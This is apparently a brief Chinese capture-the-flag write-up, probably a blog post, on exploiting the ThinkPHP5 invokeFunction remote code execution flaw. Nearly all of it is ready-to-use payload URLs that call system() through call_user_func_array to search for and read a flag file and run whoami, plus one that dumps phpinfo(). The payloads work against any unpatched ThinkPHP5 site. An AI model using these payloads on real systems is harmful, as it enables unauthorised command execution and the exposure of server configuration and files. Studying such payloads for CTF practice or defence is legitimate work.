需要自己百度下thinkphp5的漏洞(其实看完就知道怎么做这个题目了)
payload:
s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name “*flag” 先查找关于flag在哪
s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag 看flag
利用system函数远命令执行:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
2.通过phpinfo函数写出phpinfo()的信息
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
本文深入解析了ThinkPHP5框架中的远程命令执行漏洞,详细介绍了利用system函数进行命令执行的方法,以及如何通过payload获取敏感信息,如查看用户身份和读取flag文件。同时,展示了如何使用phpinfo函数来获取服务器的详细配置信息。
3300

被折叠的 条评论
为什么被折叠?



